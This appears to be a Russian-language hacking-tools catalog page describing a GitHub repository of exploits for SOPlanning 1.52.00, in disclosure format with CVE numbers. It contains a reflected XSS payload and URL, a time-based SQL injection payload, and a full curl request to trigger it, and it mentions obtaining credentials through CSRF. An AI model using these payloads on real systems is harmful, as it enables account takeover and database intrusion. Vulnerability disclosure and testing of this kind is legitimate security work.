Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
soplanning-1.52-exploits — SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724) | Kitploit
Инструменты/GitHubGitHub/fuzzlove/soplanning-1.52-exploits
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubfuzzlove/soplanning-1.52-exploits

soplanning-1.52-exploits

SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724)

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Название эксплойта: SOPlanning v1.52.00 'groupe_save.php' XSS (Отражённый XSS)

Приложение: SOPlanning

Версия: 1.52.00

Дата: 22.04.24

Автор эксплойта: Joseph McPeters (Liquidsky)

Сайт разработчика: https://www.soplanning.org/en/

Ссылка на ПО: https://sourceforge.net/projects/soplanning/

Протестировано на: Linux

CVE: CVE-2024-33724

Эксплойт: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-XSS-README.txt

Описание: SOPlanning v1.52.00 уязвим к XSS через параметр 'groupe_id'. Удалённый неаутентифицированный злоумышленник может захватить учётную запись администратора или других пользователей. Удалённый злоумышленник может перехватить сессию или учётные данные пользователя и выполнить захват всей платформы.

Пример полезной нагрузки: "><!--

Ссылка с отражённым XSS: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><!--&nom=Project+New

Анализ: Целевая страница принимает ввод пользовательского параметра, затем перенаправляет на страницу, где отображается XSS. Полезная нагрузка, включённая в эксплойт, экранирует переменную, в которой она хранится, и закомментирует остальную часть, чтобы выполнить корректную атаку с отражённым XSS против любого аутентифицированного пользователя, включая администратора.


Название эксплойта: SOPlanning v1.52.00 'projets.php' SQLi

Приложение: SOPlanning

Версия: 1.52.00

Дата: 22.04.24

Автор эксплойта: Joseph McPeters (Liquidsky, он же fuzzlove)

Сайт разработчика: https://www.soplanning.org/en/

Ссылка на ПО: https://sourceforge.net/projects/soplanning/

Протестировано на: Linux

CVE: CVE-2024-33722

Эксплойт: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-sqli-README.txt

Описание: SOPlanning v1.52.00 уязвим к аутентифицированной SQL-инъекции через страницу 'projects.php'.

Инструкции: Аутентифицируйтесь на хосте. Учётные данные могут быть получены с помощью CSRF-эксплойта (подробности включены). После получения действительных учётных данных используйте GET/POST-запрос для отправки корректных параметров, которые приводят к SQLi.

Уязвимые параметры запроса для запроса к "/www/projets.php":

filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test

Указанные выше параметры могут быть отправлены как GET, так и POST-запросом для запуска SQLi. Пример Curl-запроса для повторного тестирования SQLi:

curl -i -s -k -X $'POST'
-H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1'
-b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D'
--data-binary $'filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test'
$'http://127.0.0.1/soplanning/www/projets.php'

Примечание: Для корректной SQL-инъекции куки должны быть аутентифицированы, а запрос – действительным. Этот curl-запрос можно использовать с прокси для реконструкции корректного запроса.

Скачать инструмент